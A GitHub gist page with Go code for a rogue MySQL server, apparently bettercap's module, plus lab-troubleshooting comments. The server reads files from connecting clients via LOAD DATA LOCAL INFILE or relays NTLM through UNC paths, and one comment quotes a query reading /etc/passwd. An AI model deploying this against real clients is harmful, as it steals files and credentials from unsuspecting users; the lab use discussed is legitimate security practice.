Skip to content

Instantly share code, notes, and snippets.

Last active May 4, 2020
What would you like to do?
for mysql.Running() {
// tcp listener
conn, err := mysql.listener.AcceptTCP()
if err != nil {
log.Warning("Error while accepting TCP connection: %s", err)
// send the mysql greeting
// read the incoming responses and retrieve infile
// TODO: include binary support and files > 16kb
b := make([]byte, 16384)
// parse client capabilities and validate connection
// TODO: parse mysql connections properly and
// display additional connection attributes
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
if len(clientCapabilities) == 16 {
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
log.Info("MySQL connection from: %s", remoteAddress)
loadData := string(clientCapabilities[8])
log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
username := bytes.Split(b[36:], []byte{0})[0]
log.Info("MySQL Login Request Username: %s", username)
// send initial responseOK
infileLen, err := bufio.NewReader(conn).Read(b)
if err != nil {
log.Warning("Error while reading buffer: %s", err)
// check if the infile is an UNC path
if strings.HasPrefix(mysql.infile, "\\") {
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
} else {
// print the infile content, ignore mysql protocol headers
// TODO: include binary support and output to a file
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
// send additional response
defer conn.Close()
Copy link

guanicoe commented May 4, 2020

@bmaia I did not expect such swift response. I did check the code in bettercap as saw it was indeed included. I'm about to test your tool on htb thanks ;)

Copy link

guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572 . Basically I get [sys.log] [war] mysql.server unpexpected buffer size 4 error (I actually also corrected the typo in the main code)
I don't really know what it means nor how to troubleshoot.



$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Do you think you could help?

Copy link

bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:

Copy link

guanicoe commented May 4, 2020

ok i'll give it a try. I did first try but it spat a lot of exceptions and reading your post I thought I'd give bettercap a try as everything was integrated

error: uncaptured python exception, closing channel <__main__.http_request_handler connected at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/|read|83] [/usr/lib/python2.7/|handle_read_event|449] [/usr/lib/python2.7/|handle_read|147] [|found_terminator|184])

Copy link

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment